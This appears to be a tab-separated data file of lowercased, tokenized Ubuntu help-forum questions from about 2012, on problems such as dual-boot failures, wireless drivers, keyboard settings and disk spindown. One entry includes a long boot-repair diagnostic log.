196390	how to add sublime text to dash	i tried 2 types of links and it still i cant add it ! i use the unregistered 64 version . on ubuntu forums and external site why is it not coming in the dash board . what is wrong ? i even restarted the system to check if it came after the restart after the .desktop file . while the solution listed on the ubuntu forum asks to enter `` main menu '' , there is no match in mine .
196391	setting `` num lock '' to be enabled by default ?	everytime i start ubuntu i have to hit the num lock button which is n't a big deal but i so use it a lot and it would be nice to have it enabled by default . can someone tell me how to so this ?
196392	ubuntu 12.04 terminal font appears smashed together regardless of font or font size . how do i fix this ?	when running terminal the font appears smashed with some characters overlapping . it makes it very difficult to follow along . is there a reason and maybe a fix ?
196393	12.04 lts wireless not working in dell insprion e1405	i have the windows xp media edition running on my dell inspiron e1405 with all the hardware working properly . recently i wipe out the windows and installed the ubuntu 12.04 lts using the cd and the installation process completed successfully but my wireless stopped working after . computer wireless indicator turned off and i ca n't even do the wired connection as well . it is broadcom bcm4311 adapter . i tried to download the driver from the dell website but they do n't have the linux version of the driver if its that causing the problem . i appreciate your help that can solve my issue . thank you .
196396	unable to boot into windows after installing ubuntu 12.04	i have windows on my machine and then installed ubuntu 12.04 using usb . i was not getting the option to boot into windows , so i ran boot-repair but still i am not getting option to boot into windows . below is my paste ubuntu url . what can be the issue ? http : //paste.ubuntu.com/1260007/ edit : i have deleted my recovery partition ( some 20gb ) and installed ubuntu on it .
196403	kubuntu 12.10 shortcut to restart x server ?	i have just upgraded from kubuntu 12.04 to 12.10 . until now , i was using altgr+printscreen+k key combination to restart the x server . after the last upgrade this shortcut does n't work anymore . do you know if there is any new key combination to restart the x server ? an online search did not return any obvious results as 12.10 is not very popular since it has n't been released yet .
196408	how to put different password for screensaver ?	using ubuntu 12.04 . i 'd like to know if it is possible to set a different password for ubuntu screensaver or not ?
196412	lots of ram . how to use it ?	my pc has 8 gb of ram . is there any way to make ubuntu use most of it ? i mean rarely drop caches and keep once opened programms in ram longer , preload apps on boot , etc .
196415	stucked in the grub command prompt	i have a windows xp os , and i ve decided to give ubuntu a shot . i installed and it when rebooting it did boot by default windows . i red several forums and after entering those commands : sudo mkdir /mnt/ubuntu sudo mount /dev/sda2 /mnt/ubuntu sudo grub-install /dev/sda -- root -directory=/mnt/ubuntu after rebooting the system showed me the command grub . and i can not get anywhere . i don t have a windows cd to fix anything . so how can i launch windows from this command grub ? thanks ... i am in a real mess .
196418	creating a keyboard shortcut to open a specific folder/directory	i have dropbox installed . so i would like to create a keyboard shortcut to open my dropbox directory in nautilus ? what is the command that i have to put in the 'command ' field ? thanks
196424	how do i open pdfs from gnome-shell in evince ?	when i press the super key and search for a pdf ( or a libreoffice document ) and then click it to open , it opens in gnome-documents . which while i 'm sure is well intentioned is very frustrating , as it 's a piece of incomplete software . when i click on a document i want to work with it not just look at it ( and sometimes that 's not even possible ) .
196430	why does the network icons sometimes disappears from the systray ?	i 'm using ubuntu 12.04 in a samsung 305u notebook and sometimes the icon of the wifi or network disappears from the systray and i have to enter to system settings to enter or disconnect from a network . is there some way to fix it ?
196436	why does n't gparted show my usb stick ?	i have a new 16 gb kingston flash pen that i can not format gparted does n't seem to see it it has some windows exe and files on it in do not have the format option as described here for nautilus , thunar or pcmanfm its properties in nautilus are
196439	how to use firefox sync ?	i 'd like to have all firefox installations i use synced . the `` starting point '' should be a specific firefox installation , from now called `` firefox a '' . means : first , every firefox installation is like this installation `` a '' , then everything i change at one installation is applied to all the others . now and then i 'm on another pc which is mine then for some weeks , there i 'd like to log in - have all my bookmarks , add-ons etc and everything i change from there should be applied to all the other installations . after some weeks i 'd like to log-out again and everything should be like before . i never have to of this devices together ! this should be able to do with firefox sync , should n't it ? but i do n't get it . i red all supertartikels on the official firefox website . so what did i try ? from firefox installation `` a '' i made a sync account , from another i connected to sync . what happened . suddenly i have a hodgepodge from bookmarks that were there before and from the bookmarks from the other installation . my add-ons from the installation `` a '' were there . my tabs were n't synced . from then nothing synced anymore . no matter if i changed my bookmarks or tabs on the one or the other installation - nothing synced . can you help me ?
196444	how do i auto-start xen guests on boot ?	i have just upgraded to ubuntu server 12.04 and permanently run a xen guest . we have migrated to the xl toolstack for xen ( from xm ) as suggested which unlike xm does not have support for managed domains . xm is being removed in xen 4.2 so i need to migrate away . how should i configure my host to autostart xen guests ?
196452	ubuntu download problems	i was downloading ubuntu from www.ubuntu.com/download/desktop and in the middle of the download my monitor display became white and when it restarted it windows had crashed . i 'm pretty eager to try ubuntu bcoz of its speed and stability . any alternatives to download ubuntu ?
196458	converting a .gif into a .swf using gif2swf	new to the forums , and the whole ubuntu world , also not a technical person , so please be gracious . try as i might i can not figure this thing out . please keep in mind i know virtually nothing about how to run this thing ( read : terminal ) . i just need to convert a .gif file i created into a flash ( .swf ) for my website . here 's what i typed ( no laughing , ok maybe a little ) and the response : pandora @ pandora-satellite-l645 : ~ $ gif2swf -o test.swf -r 12 animate.gif could n't open animate.gif ! error opening input file : animate.gif no gif files found in arguments i have a feeling it 's something quite simple that i 'm missing but like i said , total n00b . it took forever for me to even figure out i needed to type something .
196459	how to open a file when 'vi ' reports it is already open ?	for some reason , when i am trying to edit vi .profile , the terminal keeps telling me that i already have the .profile in the edit mode . e325 : attention found a swap file by the name `` .profile.swp '' owned by : smaranh dated : fri apr 6 09:46:45 2012 file name : ~smaranh/.profile modified : yes user name : smaranh host name : ubuntu process id : 4394 while opening file `` .profile '' dated : fri apr 27 10:35:32 2012 newer than swap file ! ( 1 ) another program may be editing the same file . if this is the case , be careful not to end up with two different instances of the same file when making changes . quit , or continue with caution . ( 2 ) an edit session for this file crashed . if this is the case , use `` : recover '' or `` vim -r .profile '' to recover the changes ( see `` : help recovery '' ) . if you did this already , delete the swap file `` .profile.swp '' to avoid this message . `` .profile '' 23 lines , 713 characters press enter or type command to continue so i tried to kill the process that the message above was showing , but it keeps showing no such process . i then used ps -ef | grep 4394 and got this output , smaranh 3491 3375 0 10:08 pts/3 00:00:00 grep -- color=auto 4394 so i tried kill -9 3491 but it still gave me no such process . not sure what is wrong ? how do i close the already open .profile ?
196463	eclipse invalid configuration location	i was working fine with eclipse for about a week but suddenly now when i start the eclipse , i get the following error : invalid configuration location the configuration area at -- -'/home/yash/.eclipse/org.eclipse.platform_3.7.0_155965261/configuration ' is not writable . please choose a writable location using the '-configuration ' command line option . please help .
196464	how to have ssh running in the rescue mode ?	if i select rescue mode in grub , ssh is not run . i have to type start ssh to have it running . can i made this be done automatically for me ? typical situation is with broken graphics , when i need to login to the box remotely . now , i have to type start ssh blindly first and hope .
196467	synchronizing thunderbird15.0.1-contacts with carddav-server without using sogo-connector	i have my own server ( running 12.04 ) on which i installed owncloud and were able to successfully synchronize my calendar via caldav . but when trying to synchronize my contacts with carddav , nothing worked . everywhere i searched , all i could find was using sogo-connector which did n't work at all . by the way : one thing sogo-connector did , was asking me twice for my master password every time i started thunderbird . is this an owncloud-specific ( v. 4.04 ) problem ? if anyone has a solution wihout owncloud or without carddav in general , this is fine , but it should n't store my contact data anywhere else than on my server ( that means no cloud storage solution ) . it may help to know , that i have a working sparkleshare synchronisation . edit : now using radicale instead of owncloud but with the same problems .
196468	browsers are lagging to load some webpages	i 'm facing a problem both on firefox ( no addons ) & chrome ( ubuntu 12.04 ) , some sites like facebook , askubuntu , deviantart are not loading even after 10-15minutes of time . but youtube videos or other sites are running quiet well . the problem is webpage specific , if anyone knows how to get rid of the problem please help . thanks in advance
196472	dell 15r overheating	hello after installing ubuntu 12.04 my laptop is constantly running above 60째c . i have installed the relative third party drivers but still the same . my laptop is a dell 15r n5010 , i5 . 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati manhattan [ mobility radeon hd 5400 series ] ( prog-if 00 [ vga controller ] ) .
196473	setting sata hdd spindown time	i am able to spindown my sata hdds by using sudo hdparm -y /dev/sdc the state shown by sudo hdparm -c /dev/sdc changes from active/idle to standby ( and i can hear the hdd spin down ) . however , using sudo hdparm -s5 /dev/sdc does n't spin down the drive after 5*5 = 25secs . some additional information : ahci is enabled . i am using western digital green drives . apm_level = not supported filesystem is ext4 edit : this question is not a duplicate to how can i control hdd spin down time ? because it addresses western digital green drives , which will not work with hdparm .
196474	caps lock not working	my caps lock key on my keyboard is not working . the light indicator does not come on and nothing is capitalized when typing . what do i need to do to fix this issue . xmodmap -e `` add lock = caps_lock '' did not work . swapped out other keyboards and still have the same results . the caps lock is working on all three on windows .
196475	what am i doing wrong ? visudo	i am trying to make it so that i can have a script running on my computer that will check to see if a reboot code has been sent , and it will be checking a mysql database . i have the php script written , but when i run it , it says that to reboot i need to be root . php : shell_exec ( `` /sbin/reboot '' ) ; i have tried to edit visudo and added this to bottom of the file : all all = nopasswd : /sbin/reboot it still does n't work . what do i need to do differently ?
196479	sbd asking for cache data failed	background : i have been trying live usb versions of ubuntu on my `` dell inspiron mini '' for several years . none of the previous versions were able to detect the high resolution screen ( 1366x768 ) . finally version 12.04 was able to detect the screen properly so i went ahead with the installation . i am relatively new to linux so i accepted all the defaults during installation ( dual boot with windows xp ) and it seemed to go well . problem : after rebooting and choosing `` ubuntu , with linux 3.2.0-31-generic-pea '' from the gnu grub boot menu i get the following and ubuntu will not continue booting : * stopping save kernel messages [ ok ] * checking battery state ... [ ok ] * stopping system v runlevel compatibilty [ ok ] 53.796074 ] sd 2:0:0:0 : [ sdb ] asking for cache data failed attempts to fix : i have tried booting into the `` recovery mode '' and choosing `` repair broken packages '' as well as `` check all file systems '' , but no change to the main problem . i tried `` run in failsafe graphic mode '' - but this failed ( `` fatal server error : no screens found '' . ) i also tried doing a complete reinstallation from the liveusb - but no change in the result . computer specifications : dell inspiron mini 10 , intel atom cpu z530 1.32ghz , intel graphics media accelerator 500 , 160 gb hard disk drive ( currently 118 gb allocated to windows and the remaining used by the failed ubuntu installation . ) question : why does it say [ sdb ] instead of [ sda ] in the error above ? i thought that/sdb refers to a second physical hard drive - but there is only one hard drive in this computer . or is the problem something completely different ? what am i missing ?
196482	12.04 - partitioning extended to primary	i 've been playing around with ubuntu a lot lately , and i want to use it as my primary os . when i first downloaded it , i think that grub2 became the boot master instead of the windows 7 bootloader . every time i tried to boot windows 7 , it would fail . the windows 7 disk did n't come with my desktop , so i could n't find a way to fix it . i like ubuntu more though so i 'm ok with that . i downloaded gparted to delete the windows partition and make ubuntu the primary partition , and this is where i 'm stuck . this is what is showing up on gparted : /dev/sda1 file system : fat32 mount point : /boot/efi label : system size : 100 mb used : 21.89 mb unused : 78.11 mb flags : boot unallocated file system : unallocated size : 263.28 gb /dev/sda5 file system : ext4 mount point : / size : 182.03 gb used : 16.21 gb unused : 165.82 gb /dev/sda6 file system : linux-swap size : 3.58 gb unallocated filesystem : unallocated size : 16.78 gb i do n't know what to do next . i unmounted sda1 and sda6 , but ca n't unmount sda5 , which is the partition for ubuntu that i 'm using right now . when i try to unmount it , it says : could not unmount /dev/sda5 the partition could not be unmounted from the following mount points : / most likely other partitions are also mounted on these mount points . you are advised to unmount them manually . i 've unmounted everything else though i think . i ca n't create a partition table because of that either . i would try more things but i do n't know what to do . i do n't want to mess up anything either . any ideas ?
196483	fresh install , wo n't boot , only in safemode	it 's a win7 dual boot . it just gives me the orange background when booting and nothing else . in safe mode however it boots normal but very slow/freezes when i try to do anything . i do n't know how to go about it , when i live run it from usb it works like magic and very fast , way faster than windows 7 ; i have now deleted it , but i'am looking forward to making it work . any help is appreciated , thanks in advance here are my specs operating system ms windows 7 ultimate 64-bit sp1 cpu intel core i5 750 @ 2.67ghz 44 째c lynnfield 45nm technology ram 4.00 gb dual-channel ddr3 @ 660mhz ( 9-9-9-24 ) motherboard gigabyte technology co. , ltd. p55a-ud3 ( socket 1156 ) 37 째c graphics e2241 ( 1920x1080 @ 60hz ) ati radeon hd 5700 series ( ati ) 43 째c hard drives 488gb seagate st3500320as ata device ( sata ) 36 째c optical drives hl-dt-st dvdram gsa-h62n ata device audio realtek high definition audio
196486	why does ftp ( via dolphin and kate ) require authentication every few minutes ?	why does ftp ( via dolphin and kate ) require authentication every few minutes on kubuntu 12.04 ? it seems to work ok on one ftp server but not on another .
196488	ubuntu not booting , thrown into busybox	i get this problem even in recovery mode , even with older versions of ubuntu that are still in the grub menu . i ran the default repair of the boot repair ( as recommended in this question ) , to no avail . this is what comes up on boot : ... [ sdb ] add . sense : unrecovered read error - auto real locate failed ... mount : mounting /dev/disk/bu-uuid/d818 ... . on /root failed : invalid argument ... target filesystem does n't have requested /sbin/init busybox v1.18.4 ... built-in shell ( ash ) ... ( initramfs ) i then type exit and get ... kernel panic ... not synching : attempted to kill init ! ... pid : 1 , com : init not tainted 3.0.0-16-generic # 28-ubuntu here is what dmesg |tail gives me [ 1724.112966 ] descriptor sense data with sense descriptors ( in hex ) [ 1724.112970 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 1724.112991 ] 00 84 d3 21 [ 1724.113000 ] sd 2:0:0:0 : [ sdb ] add . sense : unrecovered read error - auto reallocate failed [ 1724.113015 ] sd 2:0:0:0 : [ sdb ] cdb : read ( 10 ) : 28 00 00 84 d3 1f 00 00 08 00 [ 1724.113030 ] end_request : i/o error , dev sdb , sector 8704801 [ 1724.113046 ] jbd2 : failed to read block at offset 6748 [ 1724.113057 ] ata3 : eh complete [ 1724.113059 ] jbd2 : recovery failed [ 1724.113063 ] ext4-fs ( sdb1 ) : error loading journal below is a boot info summary . it seems that sdb1 , where ubuntu is located , is not mounting : `` wrong fs type bad option , bad superblock . '' how can i get my ubuntu to boot ? boot info script 0.61.full + boot-repair extra info [ boot-info september 18th 2012 ] ============================= boot info summary : =============================== = > syslinux mbr ( 3.61-4.03 ) is installed in the mbr of /dev/sda . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos1 ) /boot/grub on this drive . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdc and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 1 for /boot/grub . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe /ntldr /ntdetect.com sdb1 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : mounting failed : mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so sdb2 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sdb5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb3 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sdc1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 82.0 gb , 81964302336 bytes 255 heads , 63 sectors/track , 9964 cylinders , total 160086528 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 63 160,071,659 160,071,597 7 ntfs / exfat / hpfs drive : sdb _____________________________________________________________________ disk /dev/sdb : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 63 19,535,039 19,534,977 83 linux /dev/sdb2 300,576,150 312,576,704 12,000,555 5 extended /dev/sdb5 300,576,213 312,576,704 12,000,492 82 linux swap / solaris /dev/sdb3 19,535,040 300,576,149 281,041,110 83 linux drive : sdc _____________________________________________________________________ disk /dev/sdc : 1000.2 gb , 1000202043392 bytes 255 heads , 63 sectors/track , 121600 cylinders , total 1953519616 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdc1 * 2,048 1,953,519,615 1,953,517,568 7 ntfs / exfat / hpfs '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 1ec8a6d4c8a6aa0b ntfs local disk /dev/sdb1 d8183543-f97b-4f71-b27f-3fa8426ccfdd ext4 /dev/sdb3 f7d87294-1460-459b-a29a-76a8ca85526f ext4 /dev/sdb5 6036269d-9307-4ec0-b67e-0d28a0b2f790 swap /dev/sdc1 fcce6e20ce6dd404 ntfs elements ================================ mount points : ================================= device mount_point type options /dev/sdc1 /media/elements fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sr0 /live/image iso9660 ( ro , noatime ) =============================== stderr messages : =============================== no volume groups found mdadm : no arrays found in config file or automatically additional information : =================== log of boot-repair 2012-10-04__20h16 =================== boot-repair version : 3.193-0ppa22~lucid boot-sav version : 3.193-0ppa39~lucid glade2script-gtk2 version : 0.0.1-0ppa4~lucid boot-sav-nonfree version : /usr/share/boot-sav/gui-update.sh : line 77 : add-apt-repository : command not found /usr/share/boot-sav/gui-update.sh : line 77 : add-apt-repository : command not found deb http : //ppa.launchpad.net/yannubuntu/os-uninstaller/ubuntu lucid main /usr/share/boot-sav/gui-update.sh : line 77 : add-apt-repository : command not found /usr/share/boot-sav/gui-update.sh : line 77 : add-apt-repository : command not found deb http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu lucid main w : gpg error : http : //ppa.launchpad.net lucid release : the following signatures could n't be verified because the public key is not available : no_pubkey 32b18a1260d8da0b w : gpg error : http : //ppa.launchpad.net lucid release : the following signatures could n't be verified because the public key is not available : no_pubkey 32b18a1260d8da0b w : duplicate sources.list entry http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/ lucid/main i386 packages ( /var/lib/apt/lists/ppa.launchpad.net_yannubuntu_boot-repair_ubuntu_dists_lucid_main_binary-i386_packages ) w : duplicate sources.list entry http : //ppa.launchpad.net/yannubuntu/os-uninstaller/ubuntu/ lucid/main i386 packages ( /var/lib/apt/lists/ppa.launchpad.net_yannubuntu_os-uninstaller_ubuntu_dists_lucid_main_binary-i386_packages ) 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 63 not upgraded . warning : the following packages can not be authenticated ! os-uninstaller 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 63 not upgraded . warning : the following packages can not be authenticated ! boot-repair debconf : unable to initialize frontend : dialog debconf : ( dialog frontend will not work on a dumb terminal , an emacs shell buffer , or without a controlling terminal . ) debconf : falling back to frontend : readline debconf : unable to initialize frontend : readline debconf : ( this frontend requires a controlling tty . ) debconf : falling back to frontend : teletype debconf : unable to initialize frontend : dialog debconf : ( dialog frontend will not work on a dumb terminal , an emacs shell buffer , or without a controlling terminal . ) debconf : falling back to frontend : readline debconf : unable to initialize frontend : readline debconf : ( this frontend requires a controlling tty . ) debconf : falling back to frontend : teletype debconf : unable to initialize frontend : dialog debconf : ( dialog frontend will not work on a dumb terminal , an emacs shell buffer , or without a controlling terminal . ) debconf : falling back to frontend : readline debconf : unable to initialize frontend : readline debconf : ( this frontend requires a controlling tty . ) debconf : falling back to frontend : teletype dpkg-preconfigure : unable to re-open stdin : debconf : unable to initialize frontend : dialog debconf : ( dialog frontend will not work on a dumb terminal , an emacs shell buffer , or without a controlling terminal . ) debconf : falling back to frontend : readline debconf : unable to initialize frontend : readline debconf : ( this frontend requires a controlling tty . ) debconf : falling back to frontend : teletype bus error no volume groups found boot-repair is executed in live-session ( boot-repair-disk 18.07.2012 , squeeze , debian , i686 ) cpu op-mode ( s ) : 32-bit , 64-bit initrd=/live/initrd.img boot=live config quiet boot_image=/live/vmlinuz mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so sudo : can not get working directory =================== os-prober : /dev/sda1 : windows 7 ( loader ) : windows : chain =================== blkid : /dev/sda1 : label= '' local disk '' uuid= '' 1ec8a6d4c8a6aa0b '' type= '' ntfs '' /dev/sdb1 : uuid= '' d8183543-f97b-4f71-b27f-3fa8426ccfdd '' type= '' ext4 '' /dev/sdb3 : uuid= '' f7d87294-1460-459b-a29a-76a8ca85526f '' type= '' ext4 '' /dev/sdb5 : uuid= '' 6036269d-9307-4ec0-b67e-0d28a0b2f790 '' type= '' swap '' /dev/loop0 : type= '' squashfs '' /dev/sdc1 : label= '' elements '' uuid= '' fcce6e20ce6dd404 '' type= '' ntfs '' 1 disks with os , 1 os : 0 linux , 0 macos , 1 windows , 0 unknown type os . mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so =================== dmesg | grep efi : this live-session is not efi-compatible . =================== partitions & disks : sda1 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , ntldr , haswinload , no-recov-nor-hid , bootmgr , is-winboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sda1 . sdb1 : sdb , maybesepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sdb1 . sdb3 : sdb , maybesepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sdb3 . sdc1 : sdc , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , not-far , /media/elements . sda : not-gpt , biosboot-not-needed , has-no-efipart , not-usb , has-os , 63 sectors * 512 bytes sdb : not-gpt , biosboot-not-needed , has-no-efipart , not-usb , no-os , 63 sectors * 512 bytes sdc : not-gpt , biosboot-not-needed , has-no-efipart , usb-disk , no-os , 2048 sectors * 512 bytes =================== parted -l : model : ata maxtor 6y080l0 ( scsi ) disk /dev/sda : 82.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 82.0gb 82.0gb primary ntfs boot model : ata wdc wd1600aajs-2 ( scsi ) disk /dev/sdb : 160gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 10.0gb 10.0gb primary ext4 boot 3 10.0gb 154gb 144gb primary ext4 2 154gb 160gb 6144mb extended 5 154gb 160gb 6144mb logical linux-swap ( v1 ) model : wd ext hdd 1021 ( scsi ) disk /dev/sdc : 1000gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 1000gb 1000gb primary ntfs boot warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label =================== parted -lm : byt ; /dev/sda:82.0gb : scsi:512:512 : msdos : ata maxtor 6y080l0 ; 1:32.3kb:82.0gb:82.0gb : ntfs : :boot ; byt ; /dev/sdb:160gb : scsi:512:512 : msdos : ata wdc wd1600aajs-2 ; 1:32.3kb:10.0gb:10.0gb : ext4 : :boot ; 3:10.0gb:154gb:144gb : ext4 : : ; 2:154gb:160gb:6144mb : : : ; 5:154gb:160gb:6144mb : linux-swap ( v1 ) : : ; byt ; /dev/sdc:1000gb : scsi:512:512 : msdos : wd ext hdd 1021 ; 1:1049kb:1000gb:1000gb : ntfs : :boot ; warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label =================== mount : aufs on / type aufs ( rw ) tmpfs on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type tmpfs ( rw , mode=0755 ) tmpfs on /dev/shm type tmpfs ( rw , nosuid , nodev ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=620 ) /dev/sr0 on /live/image type iso9660 ( ro , noatime ) tmpfs on /live/cow type tmpfs ( rw , noatime , mode=755 ) tmpfs on /live type tmpfs ( rw , relatime ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) /dev/sdc1 on /media/elements type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sda1 on /mnt/boot-sav/sda1 type fuseblk ( rw , allow_other , blksize=4096 ) /dev/sdb3 on /mnt/boot-sav/sdb3 type ext4 ( rw ) =================== ls : /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device ext_range holders inflight power queue range removable ro sda1 size slaves stat subsystem trace uevent /sys/block/sdb ( filtered ) : alignment_offset bdi capability dev device ext_range holders inflight power queue range removable ro sdb1 sdb2 sdb3 sdb5 size slaves stat subsystem trace uevent /sys/block/sdc ( filtered ) : alignment_offset bdi capability dev device ext_range holders inflight power queue range removable ro sdc1 size slaves stat subsystem trace uevent /sys/block/sr0 ( filtered ) : alignment_offset bdi capability dev device ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev ( filtered ) : agpgart block bsg bus cdrom cdrw char console core cpu_dma_latency disk dri dvd dvdrw fb0 fd full fuse hidraw0 hidraw1 hpet initctl input kmsg log makedev md mem net network_latency network_throughput null port ppp psaux ptmx pts random rtc rtc0 scd0 sda sda1 sdb sdb1 sdb2 sdb3 sdb5 sdc sdc1 sg0 sg1 sg2 sg3 shm snapshot snd sndstat sr0 stderr stdin stdout urandom vga_arbiter xconsole zero ls /dev/md : ls /mnt/boot-sav/sda1 : zfvnk windows users temp information volume system shared recycler $ recycle.bin rebeccanew files program programdata pagefile.sys ntldr ntdetect.com msdos.sys maxis io.sys amvvideoconverter iorgsoft hiberfil.sys fyi_movie found.004 found.003 found.002 found.001 found.000 dvdvideosoft settings and documents config.sys config.msi changes.dat boot-sav bootmgr boot $ avg autoexec.bat =================== df -th : filesystem type size used avail use % mounted on aufs aufs 1008m 42m 967m 5 % / tmpfs tmpfs 1008m 0 1008m 0 % /lib/init/rw udev tmpfs 1003m 188k 1003m 1 % /dev tmpfs tmpfs 1008m 0 1008m 0 % /dev/shm /dev/sr0 iso9660 339m 339m 0 100 % /live/image tmpfs tmpfs 1008m 42m 967m 5 % /live/cow tmpfs tmpfs 1008m 0 1008m 0 % /live tmpfs tmpfs 1008m 8.0k 1008m 1 % /tmp /dev/sdc1 fuseblk 932g 167g 765g 18 % /media/elements /dev/sda1 fuseblk 77g 61g 16g 80 % /mnt/boot-sav/sda1 /dev/sdb3 ext4 132g 57g 69g 46 % /mnt/boot-sav/sdb3 =================== fdisk -l : disk /dev/sda : 82.0 gb , 81964302336 bytes 255 heads , 63 sectors/track , 9964 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x06e306e2 device boot start end blocks id system /dev/sda1 * 1 9964 80035798+ 7 hpfs/ntfs disk /dev/sdb : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe28a95a8 device boot start end blocks id system /dev/sdb1 * 1 1216 9767488+ 83 linux /dev/sdb2 18711 19457 6000277+ 5 extended /dev/sdb3 1217 18710 140520555 83 linux /dev/sdb5 18711 19457 6000246 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdc : 1000.2 gb , 1000202043392 bytes 255 heads , 63 sectors/track , 121600 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00023830 device boot start end blocks id system /dev/sdc1 * 1 121601 976758784 7 hpfs/ntfs =================== recommended repair recommended-repair this setting will restore the [ ( generic mbr ) ] mbr in sda , and make it boot on sda1 . additional repair will be performed : unhide-bootmenu-10s will restore the mbr_to_restore : sda ( generic mbr ) into sda dd if=/usr/lib/syslinux/mbr.bin of=/dev/sda 0+1 records in 0+1 records out parted /dev/sda set 1 boot on information : you may need to update /etc/fstab . sudo : can not get working directory boot successfully repaired . you can now reboot your computer .
